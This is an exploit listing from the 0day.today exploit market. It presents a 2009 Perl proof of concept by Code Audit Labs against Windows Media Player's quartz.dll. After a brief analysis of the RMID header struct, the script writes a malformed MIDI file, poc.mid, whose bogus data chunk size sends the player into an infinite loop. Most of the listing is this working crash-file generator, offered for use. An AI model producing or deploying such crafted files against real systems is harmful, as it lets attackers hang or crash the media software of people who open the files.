[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit

Author
Code Audit Labs
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6826
Category
dos / poc
Date add
16-04-2009
Platform
unsorted
==================================================================
Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
==================================================================


#! /usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596

#other version should be affected

# CVE: please assign to this a CVE id 
#
#ANALYSIS
#========
#  one vulnerability exists within the quartz.dll code processing RMID header
#the struct have following
#{
#  char riff_id[4]; //'RIFF'
#  DWORD rmid_size;
#  char rmid_id[4]; //'RMID'
#  char data_id[4]; //no eq data
#  DWORD midi_size; 
#}
#if  data_id is not 'data' , and midi_size is 0xfffffff8.
#the code would fall into infinity loop.

#

open(Fin, ">poc.mid") || die "can't create crash sample.$!";
binmode(Fin);
$data =  
"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .
"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .
"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

print Fin $data;

close(Fin);



#  0day.today [2024-12-24]  #